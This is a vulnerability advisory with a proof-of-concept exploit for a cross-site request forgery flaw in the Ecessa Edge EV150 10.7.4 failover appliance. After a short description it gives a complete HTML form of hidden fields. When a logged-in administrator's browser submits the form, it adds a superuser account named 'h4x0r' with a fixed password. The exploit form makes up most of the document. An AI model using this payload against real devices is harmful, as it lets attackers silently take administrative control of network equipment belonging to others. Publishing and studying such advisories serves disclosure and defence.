Ecessa Edge EV150 10.7.4 Add Superuser Cross Site Request Forgery

Ecessa Edge EV150 version 10.7.4 suffers from an add superuser cross site request forgery vulnerability.

MD5 | 32235352c43c1764ff3761997d4f28eb


Ecessa Edge EV150 10.7.4 CSRF Add Superuser Exploit

Vendor: Ecessa Corporation
Product web page:
Affected version: 10.7.4

Summary: Internet Failover and Load Balancing for Small Businesses, Stores
and Branch Offices.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.35

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5474
Advisory URL:



<form action="" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />

Related Posts